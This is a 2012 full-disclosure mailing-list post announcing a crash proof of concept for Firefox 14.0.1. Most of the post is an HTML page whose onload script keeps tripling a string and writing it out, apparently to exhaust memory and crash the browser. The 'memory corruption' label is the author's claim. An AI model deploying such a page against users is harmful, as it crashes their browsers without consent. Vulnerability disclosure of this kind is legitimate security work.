
Date: Mon, 30 Jul 2012 08:09:06 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Firefox 14.0.1 Memory Corruption PoC

Exploit Title: Firefox 14.0.1  Memory Corruption PoC
Crash : http://imageshack.us/f/507/firefoxh.jpg/
Date: July 30, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage:http://www.mozilla.org/
version : 14.0.1
Tested on: windows xp SP3
========================================

                        Awsome coolkaveh

--------------------------------------------------------------------------------
<html>
<head>
<title>coolkaveh</title>
<body onload="javascript:coolkaveh();">
<script language="JavaScript">
      function coolkaveh()
       {
	
    var buf = '\x41\x41\x41'
    for(i=0; i <= 800 ; ++i)
	{
    buf+=buf+buf
	document.write(buf);	
	}
	
}
</script>
</head>
</body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
